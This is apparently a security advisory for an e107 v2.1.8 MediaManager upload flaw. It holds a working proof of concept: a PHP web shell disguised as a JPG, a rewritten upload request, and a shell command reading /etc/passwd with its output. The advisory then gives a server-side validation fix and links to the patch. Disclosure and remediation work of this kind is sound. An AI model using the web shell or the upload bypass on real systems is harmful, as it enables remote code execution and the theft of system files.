e107 v2.1.8 MediaManager bypass filetype check

Description

MediaManager of e107 v2.1.8 contains a flaw that is triggered as file types and extensions for uploaded files are not properly validated before being placed in a user-accessible path. This may allow a remote attacker to upload a file and then request it in order to execute arbitrary code with the privileges of the web service.

Reproduce

  1. Log in to the admin page (/e107_admin/admin.php) and open MediaManager.

  2. Create a backdoor PHP file named "backdoor.jpg" to get past the JavaScript filter, and select it in MediaManager.

<?php system($_GET['q']) ?>

The file type check can be bypassed because it filters on the extension only.

  3. Start the upload and rewrite the request body with Burp Suite as follows. On the server side, this file is accepted as a PHP file.
POST /e107/e107_web/js/plupload/upload.php?for=&path= HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2aneEcIB6Abe9JcJ
Cookie: my_cookie=********************
Connection: close
Content-Length: 503

------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="name"

backdoor.php
------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="file"; filename="backdoor.php"
Content-Type: image/jpeg

<?php system($_GET['q']) ?>
------WebKitFormBoundary2aneEcIB6Abe9JcJ--
  4. After the uploaded file is imported, it is placed in a directory that is accessible without authentication. Access http://localhost/e107/e107_media/416f4602e3/files/2018-08/backdoor.php?q=cat%20/etc/passwd and the output of the OS command is displayed.
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false

Source Code

https://github.com/e107inc/e107/blob/604cda1f83f60c808067866e89bf93e2797f3ab5/e107_web/js/plupload/plupload.dev.js#L660-L671

The file type check is performed only by a filter on the client side, so it can be bypassed by rewriting the request; the server never re-validates the extension or the content.
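The fix for this class of bug is to validate on the server, where the client cannot reach. The following is an added example of such a check, not e107's own code and not the patch linked below; the function name, the allowlist and the form field name are assumptions. It rejects the request shown above in three independent ways: the name must carry exactly one extension, that extension must be on an image allowlist, and the first bytes of the file must match the magic number of the declared type, regardless of what Content-Type the multipart part claims.

```php
<?php
// Added example (not e107's own code): server-side upload validation that
// trusts neither the client-supplied filename, the "name" form field nor the
// Content-Type of the multipart part. All names here are assumptions.

declare(strict_types=1);

// Allowlisted extension => magic-byte signatures a file of that type may start with.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => ["\xFF\xD8\xFF"],
    'jpeg' => ["\xFF\xD8\xFF"],
    'png'  => ["\x89PNG\r\n\x1a\n"],
    'gif'  => ["GIF87a", "GIF89a"],
];

/**
 * Returns a safe, server-chosen filename to store the upload under, or null
 * if the upload must be rejected. $clientName is the untrusted name from the
 * request; $tmpPath is the temporary file PHP wrote (tmp_name).
 */
function validateImageUpload(string $clientName, string $tmpPath): ?string
{
    // 1. Drop any path component and require exactly one dot, so
    //    "backdoor.php.jpg" and "../x.jpg" never reach the allowlist.
    $base = basename($clientName);
    if (substr_count($base, '.') !== 1
        || !preg_match('/^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$/', $base)) {
        return null;
    }
    [, $ext] = explode('.', $base);
    $ext = strtolower($ext);

    // 2. The extension must be on the allowlist; php, phtml, .htaccess and
    //    everything else not listed is refused. This alone rejects "backdoor.php".
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        return null;
    }

    // 3. The content must match the declared type: compare magic bytes rather
    //    than believing the client's Content-Type header. A "jpg" that starts
    //    with "<?php" fails here.
    $head = file_get_contents($tmpPath, false, null, 0, 16);
    if ($head === false) {
        return null;
    }
    $matches = false;
    foreach (ALLOWED_IMAGE_TYPES[$ext] as $magic) {
        if (strncmp($head, $magic, strlen($magic)) === 0) {
            $matches = true;
            break;
        }
    }
    if (!$matches) {
        return null;
    }

    // 4. Never reuse the client's name on disk: a random name removes any
    //    chosen-name or overwrite possibilities.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Usage in an upload handler (assumed field name "file" and constant UPLOAD_DIR):
// if (!is_uploaded_file($_FILES['file']['tmp_name'])) { http_response_code(400); exit; }
// $safe = validateImageUpload($_FILES['file']['name'], $_FILES['file']['tmp_name']);
// if ($safe === null) { http_response_code(400); exit('upload rejected'); }
// move_uploaded_file($_FILES['file']['tmp_name'], UPLOAD_DIR . '/' . $safe);
```

The server-side check is the control; the JavaScript filter is only a convenience for users. As defence in depth, the media directory should also be served with script execution disabled (for example `php_flag engine off` in an Apache directory block under mod_php), so that even a file that slips through is returned as static content rather than executed.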

Reference

e107inc/e107#3352

Solution

https://github.com/e107inc/e107/commit/e5bb5297f68e56537c004cdbb48a30892e9f6f4c
